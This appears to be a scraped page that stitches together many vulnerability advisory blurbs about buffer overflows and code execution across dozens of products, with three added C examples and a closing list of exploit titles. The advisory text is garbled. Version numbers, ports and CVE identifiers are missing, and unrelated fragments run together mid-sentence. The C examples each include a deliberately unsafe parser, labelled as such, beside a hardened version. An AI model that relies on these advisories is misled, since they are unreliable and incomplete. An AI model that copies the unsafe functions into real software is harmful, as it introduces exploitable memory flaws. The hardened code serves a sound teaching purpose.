Exploitation of this issue requires user interaction in that a victim must open a malicious DOC file. Corel DrawStandard An unauthenticated attacker could leverage this vulnerability to access unauthorized system memory in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious CDR file. Exploitation of this issue requires user interaction in that a victim must open a malicious PPT file.
FLT in Corel Presentations This is different from CVE If an attacker specifies a Content-Length size of or larger, this integer arithmetic will wrap the value back around to a smaller integer, which is then passed to calloc to allocate memory.
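The Content-Length wrap just described and the earlier "integer wraparound ... small size allocated" entry for the third-party allocator are the same bug: an attacker-controlled length plus a fixed overhead computed in a type that silently wraps, so calloc hands back a buffer far smaller than the body that is about to be copied into it. The code below is an added example for this page, not from either product: the unsafe function reproduces the arithmetic in 32 bits, and the checked version parses, caps and adds only after proving the sum cannot wrap. HEADER_OVERHEAD is an assumed value.

```c
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Fixed bytes the server prepends to the body buffer (assumed value). */
#define HEADER_OVERHEAD 16u

/* The pattern described in the text: 32-bit arithmetic on a Content-Length
 * the client controls. For 0xFFFFFFF0 the sum wraps to 0, so calloc returns
 * a tiny buffer and the body copy that follows overflows it. */
uint32_t body_alloc_size_unsafe(uint32_t content_length) {
    return content_length + HEADER_OVERHEAD;   /* wraps modulo 2^32 */
}

/* Hardened version: digits only, parsed into the widest type, capped by
 * policy, and the addition performed only after proving it cannot wrap.
 * Returns 0 and sets *out on success, -1 if the header is rejected. */
int body_alloc_size(const char *hdr, size_t max_body, size_t *out) {
    if (hdr == NULL || *hdr == '\0') return -1;
    for (const char *p = hdr; *p; p++)            /* strtoull alone accepts "+", "-", " " and "0x" */
        if (*p < '0' || *p > '9') return -1;
    errno = 0;
    char *end;
    unsigned long long v = strtoull(hdr, &end, 10);
    if (errno == ERANGE || *end != '\0') return -1;   /* exceeded unsigned long long */
    if (v > max_body) return -1;                       /* policy cap, independent of type width */
    if (v > SIZE_MAX - HEADER_OVERHEAD) return -1;     /* the addition itself would wrap */
    *out = (size_t)v + HEADER_OVERHEAD;
    return 0;
}

/* Allocate the body buffer through the checked path. Returns NULL on rejection. */
void *alloc_body(const char *hdr, size_t max_body, size_t *size_out) {
    size_t sz;
    if (body_alloc_size(hdr, max_body, &sz) != 0) return NULL;
    void *buf = calloc(1, sz);
    if (buf != NULL && size_out != NULL) *size_out = sz;
    return buf;
}
```

The policy cap does most of the work in practice: a web server that never accepts bodies above a few megabytes cannot reach the wrap boundary at all, and the explicit SIZE_MAX check documents the invariant for the next person who changes HEADER_OVERHEAD.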
This vulnerability affected SMA , , , and v appliances. A Heap-based buffer overflow vulnerability in SonicWall SMA getBookmarks method allows a remote authenticated attacker to potentially execute code as the nobody user in the appliance. This vulnerability affected SMA , , , and v appliances firmware A buffer overflow may result in arbitrary code execution. A logic issue was addressed with improved state management.
Multiple vulnerabilities in Cisco SD-WAN vEdge Software could allow an attacker to execute arbitrary code as the root user or cause a denial of service DoS condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. The vulnerability is due to incorrect boundary checks of certain values in Easy VSS protocol packets that are destined for an affected device.
An attacker could exploit this vulnerability by sending crafted Easy VSS protocol packets to UDP port while the affected device is in a specific state. When the crafted packet is processed, a buffer overflow condition may occur. A successful exploit could allow the attacker to trigger a denial of service DoS condition or execute arbitrary code with root privileges on the underlying Linux operating system of the affected device.
Product: AndroidVersions: Android Android User interaction is needed for exploitation. Product: AndroidVersions: Android By continuously sending these specific packets, an attacker can repeatedly crash the radius daemon, causing a sustained Denial of Service (DoS).
A buffer size validation vulnerability in the overlayd service of Juniper Networks Junos OS may allow an unauthenticated remote attacker to send specially crafted packets to the device, triggering a partial Denial of Service DoS condition, or leading to remote code execution RCE.
Continued receipt and processing of these packets will sustain the partial DoS. The overlayd daemon handles Overlay OAM packets, such as ping and traceroute, sent to the overlay. The service runs as root by default and listens for UDP connections on port This issue results from improper buffer size validation, which can lead to a buffer overflow.
Unauthenticated attackers can send specially crafted packets to trigger this vulnerability, resulting in possible remote code execution. On SRX Series devices configured with UTM services a buffer overflow vulnerability in the Packet Forwarding Engine PFE of Juniper Networks Junos OS may allow an attacker to arbitrarily execute code or commands on the target to take over or otherwise impact the device by sending crafted packets to or through the device.
This issue is fixed in watchOS 7. Playing a malicious audio file may lead to arbitrary code execution. This issue is fixed in macOS Catalina Adobe Character Animator versions 3. Adobe Bridge versions Firmware developed by Shenzhen Hichip Vision Technology V6 through V20, after through , as used by many different vendors in millions of Internet of Things devices, suffers from buffer overflow vulnerability that allows unauthenticated remote attackers to execute arbitrary code via the peer-to-peer P2P service.
The software accesses data past the end, or before the beginning, of the intended buffer when handling certain certificate operations. The attacker would need to trick the user into installing a malicious application; successful exploitation may cause code execution. There is a buffer overflow vulnerability in several Huawei products.
The system does not sufficiently validate a certain configuration parameter passed from the user, which could cause a buffer overflow. The attacker would need to trick the user into installing and running a malicious application with high privileges; successful exploitation may cause code execution. There is a buffer access with incorrect length value vulnerability in some Huawei smartphones. Unauthorized users may trigger code execution when a buffer overflow occurs.
An attacker induces users to install malicious applications and sends specially constructed packets to affected devices after obtaining root permission. Successful exploitation may cause code execution. Due to insufficient input validation, an unauthenticated attacker may craft Bluetooth messages after successful pairing, causing a buffer overflow. There is a buffer overflow vulnerability in some Huawei products. The vulnerability can be exploited by an attacker to perform remote code execution on the affected products when the affected product functions as an optical line terminal (OLT).
An unauthenticated, unauthorized attacker sending a specially crafted MMS to a vulnerable phone can trigger a heap-based buffer overflow in the Quram image codec leading to an arbitrary remote code execution RCE without any user interaction. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the xHCI component. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the hypervisor.
A remote attacker can execute arbitrary code. The vulnerable function is reached when the streamer service related to AfreecaTV communicates over a WebSocket on the affected port. A stack-based buffer overflow leading to remote code execution was discovered in a strcpy call operating on the “FanTicket” field, because the data is stored without length validation. Spamsniper 5. This allows a remote attacker to execute arbitrary code via a crafted packet. A vulnerability has been identified in LOGO!
A buffer overflow vulnerability exists in the Web Server functionality of the device. A remote unauthenticated attacker could send a specially crafted HTTP request to cause a memory corruption, potentially resulting in remote code execution.
In FreeBSD A local authenticated buffer overflow vulnerability was discovered in Aruba ClearPass Policy Manager version(s): Prior to 6. A vulnerability in ClearPass OnGuard could allow local authenticated users to cause a buffer overflow condition.
A successful exploit could allow a local attacker to execute arbitrary code in the context the binary runs in, which is a lower-privileged account. This can cause a heap-based buffer overflow or other out-of-bounds access, which can lead to a DoS or potentially arbitrary code execution. In Moxa PT series firmware, Version 4. An exploitable code execution vulnerability exists in the rendering functionality of Nitro Pro When drawing the contents of a page and selecting the stroke color from an ‘ICCBased’ colorspace, the application will read a length from the file and use it as a loop sentinel when writing data into the member of an object.
Due to the object member being a buffer of a static size allocated on the heap, this can result in a heap-based buffer overflow. A specially crafted document must be loaded by a victim in order to trigger this vulnerability. An exploitable vulnerability exists in the object stream parsing functionality of Nitro Software, Inc.
When processing an object stream from a PDF document, the application will perform a calculation in order to allocate memory for the list of indirect objects. Due to an error when calculating this size, an integer overflow may occur which can result in an undersized buffer being allocated.
Later, when initializing this buffer, the application can write outside its bounds, causing memory corruption that can lead to code execution.
A specially crafted document can be delivered to a victim in order to trigger this vulnerability. Fsck 1. A specially crafted f2fs filesystem can cause a heap buffer overflow resulting in code execution.
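The Nitro Pro object-stream flaw described above is the classic allocation-size integer overflow: a count read from the file is multiplied by an entry size, the product wraps, the allocation comes out undersized, and the initialization loop that still trusts the original count writes past it. The C below is an added example, not Nitro's code; the header layout (a little-endian 32-bit count followed by 8-byte entries), the function names and the sample streams are assumptions constructed for illustration. It shows the 32-bit size calculation that wraps beside a hardened version that checks the multiplication and bounds the count by the data actually present.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical in-memory entry for one indirect object listed by an
 * object stream: object number and byte offset of its body. */
struct objstm_entry {
    uint32_t obj_num;
    uint32_t offset;
};

static uint32_t rd_u32le(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Vulnerable size calculation: 32-bit multiply of an attacker-chosen count.
 * count = 0x20000001 gives 0x20000001 * 8 = 0x1_0000_0008, truncated to 8,
 * so malloc() returns room for one entry while the caller still loops
 * 0x20000001 times. */
uint32_t objstm_table_bytes_unsafe(uint32_t count)
{
    return count * (uint32_t)sizeof(struct objstm_entry);
}

/* Hardened: overflow-checked multiply, then a plausibility bound. A table
 * cannot have more entries than the remaining payload can encode. */
bool objstm_table_bytes_safe(uint32_t count, size_t payload_len, size_t *out)
{
    size_t bytes;
    if (__builtin_mul_overflow((size_t)count, sizeof(struct objstm_entry), &bytes))
        return false;                 /* arithmetic overflow on this target */
    if (bytes > payload_len)
        return false;                 /* count exceeds what the stream holds */
    *out = bytes;
    return true;
}

/* Parses [u32 count][count x (u32 obj_num, u32 offset)] using the safe
 * size. The initialization loop is bounded by the same count that sized
 * the allocation, so it cannot run past the buffer. Returns a malloc'd
 * table (caller frees) or NULL on malformed input. */
struct objstm_entry *parse_objstm(const uint8_t *buf, size_t len, uint32_t *n_out)
{
    if (len < 4)
        return NULL;
    uint32_t count = rd_u32le(buf);
    size_t bytes;
    if (!objstm_table_bytes_safe(count, len - 4, &bytes))
        return NULL;
    struct objstm_entry *tab = malloc(bytes ? bytes : 1);
    if (tab == NULL)
        return NULL;
    for (uint32_t i = 0; i < count; i++) {
        const uint8_t *e = buf + 4 + (size_t)i * sizeof(struct objstm_entry);
        tab[i].obj_num = rd_u32le(e);
        tab[i].offset  = rd_u32le(e + 4);
    }
    *n_out = count;
    return tab;
}

/* Constructed sample headers (not taken from any real PDF). */
static const uint8_t GOOD_OBJSTM[] = {
    0x02, 0x00, 0x00, 0x00,                         /* count = 2 */
    0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* obj 10 at offset 0 */
    0x0B, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00  /* obj 11 at offset 32 */
};
static const uint8_t EVIL_OBJSTM[] = {
    0x01, 0x00, 0x00, 0x20,                         /* count = 0x20000001 */
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00  /* one entry of padding */
};

int main(void)
{
    uint32_t n = 0;
    struct objstm_entry *tab = parse_objstm(GOOD_OBJSTM, sizeof GOOD_OBJSTM, &n);
    printf("good stream: %u entries, obj %u at offset %u\n",
           (unsigned)n, (unsigned)tab[1].obj_num, (unsigned)tab[1].offset);
    free(tab);
    printf("unsafe size for count 0x20000001: %u bytes\n",
           (unsigned)objstm_table_bytes_unsafe(0x20000001u));
    printf("evil stream rejected: %s\n",
           parse_objstm(EVIL_OBJSTM, sizeof EVIL_OBJSTM, &n) == NULL ? "yes" : "no");
    return 0;
}
```

The payload-length bound is the check that matters in practice: even on a 64-bit target, where a 32-bit count times 8 cannot overflow size_t, a count of 0x20000001 would still ask for 4 GiB and then read far past the end of the stream, so the count has to be tied to the bytes that are actually there.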
An exploitable code execution vulnerability exists in the file format parsing functionality of Graphisoft BIMx Desktop Viewer A specially crafted file can cause a heap buffer overflow resulting in code execution.
An exploitable code execution vulnerability exists in the ANI file format parser of Leadtools A specially crafted ANI file can cause a buffer overflow resulting in remote code execution. Valve’s Game Networking Sockets prior to version v1. Philips Hue Bridge model 2.X prior to and including version contains a Heap-based Buffer Overflow when handling a long ZCL string during the commissioning phase, resulting in remote code execution.
Amcrest cameras and NVR are vulnerable to a stack-based buffer overflow over port An authenticated remote attacker can abuse this issue to crash the device and possibly execute arbitrary code.
An unauthenticated remote attacker may exploit this vulnerability to crash the affected process or execute arbitrary code on the system by sending specially crafted input data.
In NetHack before 3. Users should upgrade to NetHack 3. It’s been found that multiple functions in ipmitool before 1. This is especially dangerous if ipmitool is run as a privileged user. This problem is fixed in version 1. A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service DoS and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.
A local attacker could overflow a buffer and execute arbitrary code on the system or cause the system to crash. Certain IBM Aspera applications are vulnerable to buffer overflow after valid authentication, which could allow an attacker with intimate knowledge of the system to execute arbitrary code through a service. Certain IBM Aspera applications are vulnerable to buffer overflow based on the product configuration and valid authentication, which could allow an attacker with intimate knowledge of the system to execute arbitrary code or perform a denial-of-service DoS through the http fallback service.
Certain IBM Aspera applications are vulnerable to a stack-based buffer overflow, caused by improper bounds checking. This could allow a remote attacker with intimate knowledge of the server to execute arbitrary code on the system with the privileges of root or cause the server to crash. IBM Spectrum Protect 7.
This could allow a remote attacker to execute arbitrary code on the system with the privileges of an administrator or user associated with the Spectrum Protect server or cause the Spectrum Protect server to crash. By sending a specially crafted HTTP request, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause a denial of service.
A successful exploit could enable an attacker to crash Notes or execute attacker-controlled code on the client system. In HCL Notes version 9 previous to release 9. This could enable an attacker to crash HCL Notes or execute attacker-controlled code on the client. The xrdp-sesman service before version 0. Once the xrdp-sesman process is dead, an unprivileged attacker on the server could then proceed to start their own impostor sesman service listening on port This will allow them to capture any user credentials that are submitted to XRDP and approve or reject arbitrary login credentials.
For xorgxrdp sessions in particular, this allows an unauthorized user to hijack an existing session. This is a buffer overflow attack, so there may be a risk of arbitrary code execution as well. Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution.
Adobe Acrobat and Reader versions A specially crafted TIFF file can lead to arbitrary code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
A vulnerability in Cisco FXOS Software could allow an authenticated, local attacker with administrative credentials to cause a buffer overflow condition. The vulnerability is due to incorrect bounds checking of values that are parsed from a specific file.
An attacker could exploit this vulnerability by supplying a crafted file that, when it is processed, may cause a stack-based buffer overflow. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system with root privileges.
An attacker would need to have valid administrative credentials to exploit this vulnerability. Multiple vulnerabilities in the API subsystem of Cisco Integrated Management Controller IMC could allow an unauthenticated, remote attacker to execute arbitrary code with root privileges. The vulnerabilities are due to improper boundary checks for certain user-supplied input.
When this request is processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code with root privileges on the underlying operating system OS. A vulnerability in the implementation of the Lua interpreter that is integrated in Cisco IOS XE Software could allow an authenticated, local attacker to execute arbitrary code with root privileges on the underlying Linux operating system OS of an affected device.
The vulnerability is due to insufficient restrictions on Lua function calls within the context of user-supplied Lua scripts. An attacker with valid administrative credentials could exploit this vulnerability by submitting a malicious Lua script. When this file is processed, an exploitable buffer overflow condition could occur. A successful exploit could allow the attacker to execute arbitrary code with root privileges on the underlying Linux OS of the affected device.
The vulnerability exists because of insufficiently validated Cisco Discovery Protocol packet headers. An attacker could exploit this vulnerability by sending a crafted Cisco Discovery Protocol packet to a Layer 2-adjacent affected device. A successful exploit could allow the attacker to cause a buffer overflow that could allow the attacker to execute arbitrary code as root or cause a DoS condition on the affected device.
Note: Cisco Discovery Protocol is a Layer 2 protocol. To exploit this vulnerability, an attacker must be in the same broadcast domain as the affected device Layer 2 adjacent. A buffer overflow in the web server of Flexense DupScout Enterprise A buffer overflow in the web interface allows attackers to achieve pre-authentication remote code execution.
A stack-based buffer overflow vulnerability in FortiWeb 6. A specially crafted STL file can lead to code execution. A stack-based buffer overflow vulnerability exists in the Objparser::objparse functionality of Prusa Research PrusaSlicer 2.
A specially crafted obj file can lead to code execution. A heap-based buffer overflow vulnerability exists in the configuration server functionality of the Cosori Smart 5. A specially crafted JSON object can lead to remote code execution. A heap-based buffer overflow privilege escalation vulnerability in Trend Micro ServerProtect for Linux 3.
An attacker must first obtain the ability to execute high-privileged code on the target in order to exploit this vulnerability. Affected applications lack proper validation of user-supplied data when parsing PAR files. This could lead to a stack based buffer overflow. This affects Rv2 V1. An issue was discovered on Samsung mobile devices with Q Exim 4 before 4. A heap-buffer overflow was found in the way openjpeg2 handled certain PNG format files. An attacker could use this flaw to cause an application crash or in some cases execute arbitrary code with the permission of the user running such an application.
The affected product is vulnerable to a heap-based buffer overflow, which may allow an attacker to manipulate memory with controlled values and remotely execute code on the OPC UA Tunneller versions prior to 6. Opening a specifically crafted OPC UA message could allow an attacker to crash the server and remotely execute code. Affected applications lack proper validation of user-supplied data when parsing PCX files.
Affected applications lack proper validation of user-supplied data when parsing CGM files. This could lead to a stack based buffer overflow while trying to copy to a buffer in the font index handling function. This could lead to a stack based buffer overflow while trying to copy to a buffer during font string handling. Affected applications lack proper validation of user-supplied data when parsing TGA files. This could lead to a heap-based buffer overflow.
Affected applications lack proper validation of user-supplied data when parsing JT files. This has been fixed in version: ICW v3. Successful exploitation leads to arbitrary code execution. The impact is: remote arbitrary code execution. The attack vector is: a specific DNS response packet. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake.
The attacker needs to know the network’s PSK in order to exploit this. A flaw was found in dnsmasq before version 2. This flaw allows a remote attacker, who can create valid DNS replies, to cause an overflow in a heap-allocated memory. This flaw is caused by the lack of length checks in rfc The highest threat from this vulnerability is to system availability.
A remote attacker, who can create valid DNS replies, could use this flaw to cause an overflow in a heap-allocated memory. A flaw was found in dnsmasq before 2. An attacker on the network, who can create valid DNS replies, could use this flaw to cause an overflow with arbitrary data in a heap-allocated memory, possibly executing code on the machine. The flaw is in the rfc The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
An issue was discovered on Samsung mobile devices with O 8. The baseband component has a buffer overflow via an abnormal SETUP message, leading to execution of arbitrary code.
Opening a specially crafted project file could allow an attacker to exploit and execute code under the privileges of the application. The affected product is vulnerable to three stack-based buffer overflows, which may allow an unauthenticated attacker to remotely execute arbitrary code on the IP firmware versions 5. The affected product is vulnerable to five post-authentication buffer overflows, which may allow a logged in user to remotely execute arbitrary code on the IP firmware versions 5.
This allows remote takeover of a Furbo Dog Camera, for example. Buffer overflow in Yz1 0. Buffer Overflow vulnerability in FFMpeg 4. An issue was discovered in retdec v3. Buffer overflow vulnerability in function NumberToPrecisionCmd in jsish before 3. Buffer Overflow vulnerability in FFmpeg 4. A stack-based buffer overflow in the httpd server on Tenda AC9 V A buffer overflow vulnerability in the PAN-OS management web interface allows authenticated administrators to disrupt system processes and potentially execute arbitrary code with root privileges.
A buffer overflow vulnerability in PAN-OS allows an unauthenticated attacker to disrupt system processes and potentially execute arbitrary code with root privileges by sending a malicious request to the Captive Portal or Multi-Factor Authentication interface. An unauthenticated stack-based buffer overflow vulnerability in common.
A buffer overflow vulnerability in the authd component of the PAN-OS management server allows authenticated administrators to disrupt system processes and potentially execute arbitrary code with root privileges.
A buffer overflow vulnerability in the PAN-OS management server allows authenticated users to crash system processes or potentially execute arbitrary code with root privileges. A stack-based buffer overflow vulnerability in the management server component of PAN-OS that allows an authenticated user to potentially execute arbitrary code with root privileges. A stack-based buffer overflow vulnerability in the management server component of PAN-OS allows an authenticated user to upload a corrupted PAN-OS configuration and potentially execute code with root privileges.
Buffer overflow in pdf2json 0. E products with versions of The program copies an input buffer to an output buffer without verification. An attacker on the adjacent network could send a crafted message; a successful exploit could lead to a stack buffer overflow, which may cause malicious code execution.
All versions of libjpeg-turbo have a stack-based buffer overflow in the “transform” component. A remote attacker can send a malformed JPEG file to the service and cause arbitrary code execution or denial of service of the target service. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the kernel.
A heap-based buffer overflow was found in QEMU through 5. A guest user or process could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition, or potentially execute arbitrary code with privileges of the QEMU process on the host.
A stack buffer overflow vulnerability in the device control daemon DCD on Juniper Networks Junos OS allows a low privilege local user to create a Denial of Service DoS against the daemon or execute arbitrary code in the system with root privilege.
Versions of Junos OS prior to Multiple buffer overflow vulnerabilities exist when LeviStudioU Version and prior processes project files. A heap-based buffer overflow may be exploited by processing a specially crafted project file. A stack-based buffer overflow may be exploited by processing a specially crafted project file.
This occurs during packet transmission and affects the highbank and midway emulated machines. A guest user or process could use this flaw to crash the QEMU process on the host, resulting in a denial of service or potential privileged code execution.
This was fixed in commit ab43ecac60be This issue affects: Victure PC firmware version 1. These could be triggered by an extremely large number of arguments to the initrd command on bit architectures, or a crafted filesystem with very large files on any architecture. This issue affects GRUB2 version 2.
This issue will occur only when untrusted communication is initiated with server. In cloud, Agent will always connect with trusted communication. Multiple buffer overflow vulnerabilities exist in CGI scripts, leading to remote code execution with root privileges. The set of affected scripts is similar to CVE The driver’s IOCTL request handler attempts to copy the input buffer onto the stack without checking its size and can cause a buffer overflow.
This could lead to arbitrary Ring-0 code execution and escalation of privileges. This affects DirectIo The specific flaw exists within the handling of string table file uploads. An attacker can leverage this vulnerability to execute code in the context of the web server. In libIEC before version 1. This can cause an application crash or, on some platforms, even remote code execution. If your application is used on open networks or there are untrusted nodes in the network, it is highly recommended to apply the patch.
This was patched with commit ab5b. Users of version 1. As a workaround, the changes from commit ab5b can be applied to older versions. Sophos XG Firewall Hotfix HF Buffer overflows were discovered in Contiki-NG 4. The function parsing the received SNMP request does not verify the number of variables requested in the input message against the capacity of the internal SNMP engine buffer.
This makes it possible to overwrite stack regions beyond the allocated buffer, including the return address from the function. As a result, the code execution path may be redirected to an address provided in the SNMP bulk get payload. If the target architecture uses common addressing space for program and data memory, it may also be possible to supply code in the SNMP request payload, and redirect the execution path to the remotely injected code, by modifying the function’s return address.
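The Contiki-NG SNMP bug above is a missing comparison between a count taken off the wire and the capacity of a fixed-size array on the stack; once the loop runs past the array it reaches the saved return address of the parsing function, which is what makes it a control-flow hijack rather than a crash. The C below is an added example, not Contiki-NG's code: it uses a deliberately simplified request encoding (a one-byte varbind count followed by length-prefixed OID byte strings, instead of BER) and the constants SNMP_MAX_VARBINDS and SNMP_MAX_OID_BYTES are assumptions. The unchecked parser is included only to show the omitted check; the hardened parser bounds every attacker-controlled quantity before using it as an index or a copy length.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SNMP_MAX_VARBINDS  8    /* assumed engine capacity */
#define SNMP_MAX_OID_BYTES 16   /* assumed maximum encoded OID length */

struct varbind {
    uint8_t oid[SNMP_MAX_OID_BYTES];
    uint8_t oid_len;
};

/* Vulnerable: the varbind count is read from the request and used directly
 * as the loop bound. out[] lives on the caller's stack frame, so a count
 * above SNMP_MAX_VARBINDS writes past the array into whatever follows it,
 * including the saved return address. Do not call with untrusted input. */
int parse_varbinds_unsafe(const uint8_t *msg, size_t len, struct varbind *out)
{
    if (len < 1)
        return -1;
    uint8_t count = msg[0];
    size_t pos = 1;
    for (uint8_t i = 0; i < count; i++) {
        uint8_t oid_len = msg[pos++];
        memcpy(out[i].oid, msg + pos, oid_len);   /* no bound on i, oid_len or pos */
        out[i].oid_len = oid_len;
        pos += oid_len;
    }
    return count;
}

/* Hardened: count is checked against the array capacity, each OID length
 * against its destination and against the bytes remaining in the message.
 * Returns the number of varbinds parsed, or -1 (the engine should answer
 * with an SNMP error such as tooBig instead of processing the request). */
int parse_varbinds_safe(const uint8_t *msg, size_t len, struct varbind *out)
{
    if (len < 1)
        return -1;
    uint8_t count = msg[0];
    if (count > SNMP_MAX_VARBINDS)
        return -1;                          /* would overflow out[] */
    size_t pos = 1;
    for (uint8_t i = 0; i < count; i++) {
        if (pos >= len)
            return -1;                      /* length byte missing */
        uint8_t oid_len = msg[pos++];
        if (oid_len > SNMP_MAX_OID_BYTES || oid_len > len - pos)
            return -1;                      /* would overflow oid[] or read past msg */
        memcpy(out[i].oid, msg + pos, oid_len);
        out[i].oid_len = oid_len;
        pos += oid_len;
    }
    return count;
}

/* Engine entry point: the varbind table is a local array on this frame,
 * the situation in which an unchecked count corrupts the return address. */
int handle_bulk_request(const uint8_t *msg, size_t len)
{
    struct varbind vb[SNMP_MAX_VARBINDS];
    return parse_varbinds_safe(msg, len, vb);
}

/* Constructed requests in the simplified encoding (not real BER). */
static const uint8_t GOOD_REQ[] = {
    0x02,                          /* 2 varbinds */
    0x03, 0x2B, 0x06, 0x01,        /* OID 1.3.6.1 */
    0x04, 0x2B, 0x06, 0x01, 0x02   /* OID 1.3.6.1.2 */
};
static const uint8_t FLOOD_REQ[] = { 0xC8, 0x01, 0x2B };   /* claims 200 varbinds */
static const uint8_t TRUNC_REQ[] = { 0x01, 0x10, 0x2B };   /* OID length 16, 1 byte present */

int main(void)
{
    printf("good request: %d varbinds\n", handle_bulk_request(GOOD_REQ, sizeof GOOD_REQ));
    printf("flood request (200 varbinds): %d\n", handle_bulk_request(FLOOD_REQ, sizeof FLOOD_REQ));
    printf("truncated request: %d\n", handle_bulk_request(TRUNC_REQ, sizeof TRUNC_REQ));
    return 0;
}
```

A stack canary would turn the flood request into an abort rather than a redirected return on platforms that have one, but the embedded targets Contiki-NG runs on often do not, and the canary does nothing about the out-of-bounds read that the second check prevents; the fix is the bounds check, not the mitigation.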
Softing Industrial Automation all versions prior to the latest build of version 4. The affected product is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code.
These flaws allow a malicious client or server to send specially crafted messages that, when processed by the QUIC image compression algorithm, result in a process crash or potential code execution. A vulnerability in the MIME message handling of the Notes client versions 9 and 10 could potentially be exploited by an unauthenticated attacker resulting in a stack buffer overflow.
This could allow a remote attacker to crash the client or inject code into the system which would execute with the privileges of the client. A successful exploit could enable an attacker to crash Domino or execute attacker-controlled code on the server system. A vulnerability in the MIME message handling of the Domino server versions 9 and 10 could potentially be exploited by an unauthenticated attacker resulting in a stack buffer overflow.
This could allow a remote attacker to crash the server or inject code into the system which would execute with the privileges of the server. A vulnerability in the input parameter handling of HCL Notes v9 could potentially be exploited by an authenticated attacker resulting in a stack buffer overflow. This could allow the attacker to crash the program or inject code into the system which would execute with the privileges of the currently logged in user.
A vulnerability in the input parameter handling of HCL Client Application Access v9 could potentially be exploited by an authenticated attacker resulting in a stack buffer overflow. A vulnerability in the MIME message handling of the HCL Notes v9 client could potentially be exploited by an unauthenticated attacker resulting in a stack buffer overflow.
This could allow a remote attacker to crash the Notes application or inject code into the system which would execute with the privileges of the currently logged-in user. There is a buffer overflow in librsa. The overflow allows an authenticated user to execute arbitrary code by POSTing to apply.
Air Force Sensor Data Management System extract75 has a buffer overflow that leads to code execution. An overflow in a global variable sBuffer leads to a Write-What-Where outcome. By controlling that pointer, one achieves an arbitrary write when its fields are assigned. The data written is from a potentially untrusted NITF file in the form of an integer.
The attacker can gain control of the instruction pointer. A stack buffer overflow in webs in Ruckus Wireless Unleashed through Code execution can occur via a custom AT command handler buffer overflow. MiniShare 1.

Apache Continuum saveInstallation.
Trend Micro Control Manager importFile directory traversal.
ColdFusion verifyldapserver vulnerability.
HP System Management Homepage iprange parameter command execution.
HP Diagnostics magentservice.
Spring Framework Data Binding vulnerability.
PineApp Mail-SeCure ldapsyncnow.
Microsoft Azure Open Management Infrastructure remote command execution.
Oracle Database string conversion buffer overflow.
Novell iManager getMultiPartParameters file upload vulnerability.
Yahoo Messenger WScript.Shell ActiveX control command execution.
SafeNet PrivAgent.
GitLab ExifTool uploaded image command injection.
Microsoft Exchange Server ProxyLogon vulnerability.
Citrix Provisioning Services streamprocess.
Axis IP Camera authentication bypass and command injection.
Liferay Portal Apache Felix command injection.
HP Intelligent Management Center uam.
Atlassian Crowd pdkinstall arbitrary plugin installation.
Serv-U Web Client session cookie handling buffer overflow.
HP Photo Creations audio.
ReGet Deluxe.
Microsoft IIS 5.
Internet Explorer inline content filename extension vulnerability.
Microsoft IIS.
Microsoft SQL Server resolution service buffer overflow.
Linux kernel ptrace privilege elevation vulnerability.
FrontPage fp30reg.
MDaemon WorldClient form2raw.
Windows compressed folders buffer overflow.
Microsoft WINS replication service pointer corruption.
SHOUTcast filename format string vulnerability.
Solaris loadable kernel module directory traversal.
Internet Explorer Content Advisor memory corruption.
Computer Associates License Service invalid command buffer overflow.
Microsoft Color Management Module profile tag buffer overflow.
Internet Explorer COM object instantiation vulnerability.
ViRobot Server web interface addschup buffer overflow.
RealPlayer invalid chunk header heap overflow.
Oracle Security Component sys.
Citrix Program Neighborhood name buffer overflow.
Mercury Mail Transport System Phonebook service buffer overflow.
Dataspace ActiveX control vulnerability.
Mozilla Firefox QueryInterface method memory corruption.
Safari archive metadata command execution.
Internet Explorer isComponentInstalled buffer overflow.
Microsoft Visual Studio.
Internet Explorer createTextRange memory corruption.